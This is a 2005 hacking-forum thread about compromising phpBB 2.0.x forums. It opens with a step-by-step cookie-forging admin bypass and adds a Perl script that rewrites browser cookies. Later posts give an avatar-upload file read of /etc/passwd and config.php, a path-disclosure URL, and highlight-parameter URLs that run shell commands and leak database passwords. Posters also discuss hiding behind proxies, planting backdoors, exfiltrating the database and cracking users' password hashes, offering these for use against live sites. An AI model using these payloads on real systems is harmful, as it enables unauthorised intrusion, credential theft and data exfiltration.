Forums: Phpbb2 Exploit - Forums

Jump to content

  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

Phpbb2 Exploit

#1 User is offline   White Scorpion 

  • Master Sergeant
  • Group: Specialist
  • Posts: 674
  • Joined: 05-September 04

Posted 16 March 2005 - 01:51 AM



Quote

--------------------------------------------------------------------
Written by pureone@spywire.net
--------------------------------------------------------------------
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
--------------------------------------------------------------------
Lets get on with the show shall we?
your need firefox which is found > http://www.mozilla.org/
your also need the HTTP live headers plug in found >
http://livehttpheaders.mozdev.org/
ok once installed find your self a phpbb forum i suggest you install
one
localy
you may need http://www.apachefri...g/en/xampp.html
http://prdownloads.sourceforge.net/phpbb/p...12.zip?download

ok once installed open your browser at http://127.0.0.1
open HTTP live headers which is found in tools.

look for the packet that says

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

click replay
On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
a%3A2%3A%7Bs%3A11%3A%22autologinid%2%3Bb%3A1%3Bs%3A6%3A%22userid%2%3Bs%3A1%3A%222%22%3B%7D

then once again click replay.
now you should beable to see the admin control panel.
and you will be logged in as the admin.
exploited!
--------------------------------------------------------------------
Solution :
-------------------------------------------------------------------
update to phpbb 2.0.13 or what ever version is out
at the present time of reading this.

or

open> includes/sessions.php
find
if( $sessiondata['autologinid'] == $auto_login_key )

replace with
if( $sessiondata['autologinid'] === $auto_login_key )


source: bugtraq mailinglist.

The path of access leads to the server of wisdom..

The Syringe - My Latest Project.
Errors, Vulnerabilities & Exploits explained.
----
www.white-scorpion.nl
www.info-sec.eu
www.info-sec.info
0

#2 User is offline   SecureD 

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 16 March 2005 - 06:20 AM

Thanks dude! I already knew this exploit, but didnt know there was a tool called LiveHTTPHeader, seems pretty usefull to me! Thanks again.
0

#3 User is offline   Montana 

  • Private
  • Group: Members
  • Posts: 16
  • Joined: 15-September 03

Posted 05 April 2005 - 06:30 AM

I get this:

Quote

http://www.xxx.com/forum/index.php

GET http://www.xxx.com/forum/index.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2212345%22%3B%7D; phpbb2mysql_sid=158b97f06e122d1d739b5c949a4353ce

HTTP/1.x 200 OK
Date: Tue, 05 Apr 2005 14:29:04 GMT
Server: Apache/1.3.33 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.10 FrontPage/5.0.2.2635 mod_ssl/2.8.22 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.10
Cache-Control: private, pre-check=0, post-check=0, max-age=0
Expires: 0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
Set-Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2212345%22%3B%7D; expires=Wed, 05-Apr-06 14:29:04 GMT; path=/
Set-Cookie: phpbb2mysql_sid=158b97f06e122d1d739b5c949a4353ce; path=/
Proxy-Connection: Close
----------------------------------------------------------
http://www.xxx.com/favicon.ico

GET http://www.xxx.com/favicon.ico HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
Accept: image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2212345%22%3B%7D; phpbb2mysql_sid=158b97f06e122d1d739b5c949a4353ce

HTTP/1.x 404 Not Found
Date: Tue, 05 Apr 2005 14:29:08 GMT
Server: Apache/1.3.33 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.10 FrontPage/5.0.2.2635 mod_ssl/2.8.22 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Proxy-Connection: Close
----------------------------------------------------------


help? :P
0

#4 User is offline   cyrixx 

  • Private First Class
  • Group: Members
  • Posts: 128
  • Joined: 29-November 03

Posted 05 April 2005 - 10:12 AM

doesn't find the line with phpbb2support, too... :(
0

#5 User is offline   cduke250 

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 07 June 2005 - 09:54 AM

Works great on 2.0.5

What can you do once you are logged in as administrator? I want to be able to execute code to download the database to make a clone install of my forum.


#!/usr/bin/perl

#   phpBB 2.0.12 Session Handling Administrator Authentication
#   Bypass EXPLOIT
#   written by phuket
#
#   The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit
#for this bug.
#     http://packetstormsecurity.org/0503-exploits/phpbbsession.c
#
#

#  I tested this code with Firefox on my linux box, I do not know if it works
#with mozilla or on #windows
#  $url is the name of the cookie ( www.phpbb.com / $url= phpbb.com ) Look at
#cookies.txt for the name of the cookie

#  I wrote this exploit after reading "phpBB 2.0.12 Session Handling
#Administrator Authentication #Bypass    -SIMPLIFIED-"  By PPC^Rebyte
#  and it is based on his code
#
# Sorry for my bad english :/

$file = "/home/switch/.mozilla/default/542cry6r.slt/cookies.txt"; # path to your cookies.txt
$url = $ARGV[0];

open (FILE , '<'."$file" ) or die ('File does not exist') ; # path to your
#cookies.txt file
@cookie= <FILE>;
close FILE;


$exploit =
"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
;

foreach $i (@cookie)
{
        if ($i=~/$url/) {

$i
=~s/a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A(.*?)%3A%22(.*?)%22%3B%7D/$exploit/
;
print "OK\n";
}

}

open (FILE , '>'."$file") or die ('Can not write Cookie');;
print FILE @cookie;
close FILE;

#greetings to Jubeltrubel,Julien S.,crosbow,XFlorian,Nibble,Trasher and Invi;)
#thx to Paiserist,PPC^Rebyte and to the unknown discoverer of this bug :)
#phuket




This also works with phpbb on an ssl connection.

do a
slocate cookies.txt

The cookies.txt listed in the code above is for mozilla, not firefox.

Clear all your cookies, then log in with your normal username. Then close the browser. cat your cookies.txt file to see the correct url.

Then
$ phpBBphuket.pl server.secure.host.com

and it will reply OK if it works.

Then open your browser and go to the page and you will be logged in as the admin.
[0][tombs@nohost][~](1:420)
$ lynx askapache.com
0

#6 User is offline   SecureD 

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 08 June 2005 - 07:05 PM

cduke250, on Jun 7 2005, 05:54 PM, said:

Works great on 2.0.5

What can you do once you are logged in as administrator?  I want to be able to e...

Then open your browser and go to the page and you will be logged in as the admin.
<{POST_SNAPBACK}>


Just logon to the admin panel from the forum, download the databasebackup, filter all the hashes en decrypt the passwords :) as easy is that :P if you need any help, just pm me.
0

#7 User is offline   cduke250 

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 18 June 2005 - 02:47 PM

Heres what I ended up doing after I had admin access..

First I used a simple exploit to disclose the scripts directory.

Then I used the avatar exploit where you select a valid avatar from your computer, then you fill in a local path in the remote form, like /etc/passwd, and then you hit submit.

Now go to your browser and do a 'page info' and find the link to the avatar on the page like "site/images/avatars/984750982374509817.jpg"

now wget the avatar.. It is really not a picture at all, but is the file you asked for renamed as a jpg image.

So now you have access to everything on the servre.

=============================

Then I just connected to the mysql database and downloaded all the md5s of all the users..

=============================

What I would like to do is be able to upload to the server.. how can I accomplish this? using phpmyadmin?

What else can I do to gain more access or power to show off my security skills to my buddy?





NOTE: This is a buddys forum and I had permission to audit the site, as you can tell, phpbb hacking is brand new for me, and I actually enjoy it and I plan on setting up a new upgraded and security hardened phpbb forum for my friend.
[0][tombs@nohost][~](1:420)
$ lynx askapache.com
0

#8 User is offline   SecureD 

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 18 June 2005 - 03:33 PM

cduke250, on Jun 18 2005, 10:47 PM, said:

Heres what I ended up doing after I had admin access..

So you used this exploit to get access?

Quote

First I used a simple exploit to disclose the scripts directory.
How you did this?

Quote

Then I used the avatar exploit where you select a valid avatar from your computer, then you fill in a local path in the remote form, like /etc/passwd, and then you hit submit.

Now go to your browser and do a 'page info' and find the link to the avatar on the page like "site/images/avatars/984750982374509817.jpg"

now wget the avatar..  It is really not a picture at all, but is the file you asked for renamed as a jpg image. 

I understand this part, but how you did this?

Quote

So now you have access to everything on the servre.

=============================

Then I just connected to the mysql database and downloaded all the md5s of all the users..
If you need some decrypted, pm me.

Quote

=============================

What I would like to do is be able to upload to the server.. how can I accomplish this? using phpmyadmin?

What else can I do to gain  more access or power to show off my security skills to my buddy?

If you got the pws decrypted, you can try connect to the ssh deamon, or ftp, email etc. In email for example often are more security detials like account information etc.

Quote

NOTE: This is a buddys forum and I had permission to audit the site, as you can tell, phpbb hacking is brand new for me, and I actually enjoy it and I plan on setting up a new upgraded and security hardened phpbb forum for my friend.
lol ;-) yeah sure :P no i believe you.

Quote

<{POST_SNAPBACK}>



Hope you can give some answers :) Like the way you post. Very nice.
0

#9 User is offline   cduke250 

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 18 June 2005 - 10:07 PM

Quote

So you used this exploit to get access?
What I did was use 2 browsers. Firefox and Mozilla. I accessed the forum with my normal user info in both browsers. Then I closed Mozilla, put the cookie file info in the perl script, ran, and then opened mozilla and using a https-capable anonymous proxy went to the forum page [ https://site/phpBB/ ] and was automatically logged in as the administrator user.

Viewing the [ who is online ] page shows my normal user and shows the admin user, from separate IPs. Using different IPs helps to minimize risk of detection.

Quote

How you did this?

There are a number of simple path disclosure exploits. 

Here is one that works even if you aren't logged in or a registered user
/faq.php?faq=waraxe

More file disclosure vulns




Quote

I understand this part, but how you did this?
I filled in the form for "Upload avatar from local computer" with a valid avatar image on my machine. Then I filled in the form for "Upload avatar from remote url" with /etc/passwd
Then you hit submit.

What happens is /etc/passwd gets copied to a file that should be your avatar. So the file /etc/passwd is now named avatars/07432057098.jpg or whatever.

You can also use this same vulnerability to delete files off the server, but there are easier ways.

Quote

If you got the pws decrypted, you can try connect to the ssh deamon, or ftp, email etc. In email for example often are more security detials like account information etc.




Heres what I've tried since then..

I found out that there is a vulnerability that lets you easily execute commands on the server. Here are some examples. Using this you can get the config.php info like dbuser and dbpassword without having admin status!
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbuser.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbname.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbpasswd.%2527


And here is the format that I use to execute commands as normal user:
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527
&ls=cd%20dbadmin%20;mv%20.htaccess%20.htaccess.backup%20;ls%20-ap
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=cat%20/etc/fstab
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id




I havent tried anything more than that (its relatively easy to execute mysql commands to modify the sql database) really because I don't want to disrupt the site. I have been able to touch files and chmod files in key directories like dbadmin/, files/, etc., so it should be easy to install a backdoor. I'm thinking something simple like leatherman.php or something like reversewwwshell.pl.

I only really want to be able to download the entire database (maybe tar and gzip the entire $HOME directory and then scp or curl it to one of my servers, or just move the tgz file to the htdocs folder and serve it up for retrieval.

Any ideas?


Quote

If you need some decrypted, pm me.

I havent cracked any passwords since saminside first came out, back then rainbow crack was still aworkinprogress..

What would you suggest as the best way to crack the md5s? I accessed the phpMyadmin page for the site at the providers backend server (because at first I couldn't get past the .htaccess at dbadmin/) and instead of exporting or saving anything I just browsed through the phpbb_users database and manually saved each page.

The sites admin panel has the database backup function, but the only backup I can get to work is [ Structure ] only. So I have to use a mysql command or something like 'tar -zcvf' and then find a method of transport.


NOTE: Only tested on heavily customized/modified phpBB2.05
[0][tombs@nohost][~](1:420)
$ lynx askapache.com
0

#10 User is offline   SecureD 

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 19 June 2005 - 01:28 AM

cduke250, on Jun 19 2005, 06:07 AM, said:

What I did was use 2 browsers.  Firefox and Mozilla.  I accessed the forum with my normal user info in both browsers.  Then I closed Mozilla, put the cookie file info in the perl script, ran, and then opened mozilla and using a https-capable anonymous proxy went to the forum page  [ https://site/phpBB/ ]  and was automatically logged in as the administrator user.

Viewing the [ who is online ] page shows my normal user and shows the admin user, from separate IPs.  Using different IPs helps to minimize risk of detection. 

Nice :)

Quote

There are a number of simple path disclosure exploits.  
Here is one that works even if you aren't logged in or a registered user
/faq.php?faq=waraxe

More file disclosure vulns

Now i got to try this one. Have a moment. Okay. I didnt know this exploit. Didt look far enough. But when i try this i get this message:
Fatal error: [] operator not supported for strings in /var/www/html/forum/language/lang_dutch/lang_bbcode.php on line 41

Quote

I filled in the form for "Upload avatar from local computer" with a valid avatar image on my machine.  Then I filled in the form for "Upload avatar from remote url" with /etc/passwd
Then you hit submit.

What happens is /etc/passwd gets copied to a file that should be your avatar.  So the file /etc/passwd is now named avatars/07432057098.jpg or whatever.

You can also use this same vulnerability to delete files off the server, but there are easier ways.
This is very evil. I tested it on a few forums, and none of them securing against this.

Quote

Heres what I've tried since then..

I found out that there is a vulnerability that lets you easily execute commands on the server.  Here are some examples.  Using this you can get the config.php info like dbuser and dbpassword without having admin status!
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbuser.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbname.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbpasswd.%2527


And here is the format that I use to execute commands as normal user:
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527
&ls=cd%20dbadmin%20;mv%20.htaccess%20.htaccess.backup%20;ls%20-ap
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=cat%20/etc/fstab
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id


I havent tried anything more than that (its relatively easy to execute mysql commands to modify the sql database) really because I don't want to disrupt the site.  I have been able to touch files and chmod files in key directories like dbadmin/, files/, etc., so it should be easy to install a backdoor.  I'm thinking something simple like leatherman.php or something like reversewwwshell.pl.

Not working me for any forum.

Quote

I only really want to be able to download the entire database (maybe tar and gzip the entire $HOME directory and then scp or curl it to one of my servers, or just move the tgz file to the htdocs folder and serve it up for retrieval. 

Any ideas?

I havent cracked any passwords since saminside first came out, back then rainbow crack was still aworkinprogress.. 

What would you suggest as the best way to crack the md5s?  I accessed the phpMyadmin page for the site at the providers backend server (because at first I couldn't get past the .htaccess at dbadmin/) and instead of exporting or saving anything I just browsed through the phpbb_users database and manually saved each page. 

The sites admin panel has the database backup function, but the only backup I can get to work is [ Structure ]only.  So I have to use a mysql command or something like 'tar -zcvf' and then find a method of transport.

This is the most easiest part ;-) When you are logged on as administrator. Go to the administrator page. Select the backup database part. Then say you want a full backup and type into the textfield that you want the part phpbb_users. You also can check the option you want to compress it. I think this should work. Can you try it?

What is suggest by cracking MD5's is just sending me a copy of de hashes you got. You can filter them out of the sql backup. I have generated a lot of rainbow tables in the past few months, so will be able to crack at least 44%.

Quote

NOTE: Only tested on heavily customized/modified phpBB2.05
<{POST_SNAPBACK}>

0

#11 User is offline   cduke250 

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 19 June 2005 - 01:08 PM

I don't feel safe in sharing the md5s, the passwords might contain sensitive site information that I really do not want to get out. The site is a SSL forum that is meant to be highly secure.

I should also mention that chkrootkit and clamav are installed. Also, its a freeBSD system.

-----------------

Quote

Now i got to try this one. Have a moment. Okay. I didnt know this exploit. Didt look far enough. But when i try this i get this message:
Fatal error: []operator not supported for strings in /var/www/html/forum/language/lang_dutch/lang_bbcode.php on line 41[/code]


Ya so it works, it reveals that the directory is [ /var/www/html/forum ], so now for the avatar exploit, you would type in /var/www/html/forum/config.php and you will have it.

(Why is the lang dutch? are you from the NL?)
[0][tombs@nohost][~](1:420)
$ lynx askapache.com
0

#12 User is offline   SecureD 

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 19 June 2005 - 04:10 PM

cduke250, on Jun 19 2005, 09:08 PM, said:

I don't feel safe in sharing the md5s, the passwords might contain sensitive site information that I really do not want to get out.  The site is a SSL forum that is meant to be highly secure.

I should also mention that chkrootkit and clamav are installed. Also, its a freeBSD system.

-----------------

Quote

Now i got to try this one. Have a moment. Okay. I didnt know this exploit. Didt look far enough. But when i try this i get this message:
Fatal error: [] operator not supported for strings in /var/www/html/forum/language/lang_dutch/lang_bbcode.php on line 41[/code]


Ya so it works, it reveals that the directory is [ /var/www/html/forum ], so now for the avatar exploit, you would type in /var/www/html/forum/config.php and you will have it.

(Why is the lang dutch? are you from the NL?)
<{POST_SNAPBACK}>


Yup Im dutch :) Now i understand why use the stuff that reveals the dir. I just guessed it where the config file was and i guessed it right ;-). I understand you dont want to share the whole mysqldbcontent. You can, if you want send me only the md5 hashes. Without any further information I cannot use them at all, but only can crack the md5s and send you the result. I like to crack to see how much % i get cracked.
0

#13 User is offline   cduke250 

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 27 June 2005 - 04:25 PM

Hey I have a lot of friends who are Dutch, I have a lot of love for how the netherlands said NO to the empire (EU).

Like I said, I don't want to share the md5s because once the passwords are decrypted, they might contain site-information like the URL or something. Someones password might conceivably be [ nameofforum ], or something and I don't have my friends permission to do that. Remember this is supposed to be an ultra-secure site.

====================================

Heres what I still would like:
  • Best way to decrypt the MD5s
  • Best way to retrieve the md5s using phpmyadmin or sql commands

[0][tombs@nohost][~](1:420)
$ lynx askapache.com
0

#14 User is offline   cduke250 

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 27 June 2005 - 09:45 PM


Avatar exploit:
http://sceptre1.spymac.com/images/o.jpg
[0][tombs@nohost][~](1:420)
$ lynx askapache.com
0

#15 User is offline   extreme 

  • Specialist
  • Group: Specialist
  • Posts: 594
  • Joined: 02-September 03

Posted 28 June 2005 - 04:03 PM

what to do next when you have content of config.php ?
Which tool to use to connect to SQL, port number etc.

Did you find a way to upload your own file?
WUTranslink
0

Share this topic:


  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

2 User(s) are reading this topic
0 members, 2 guests, 0 anonymous users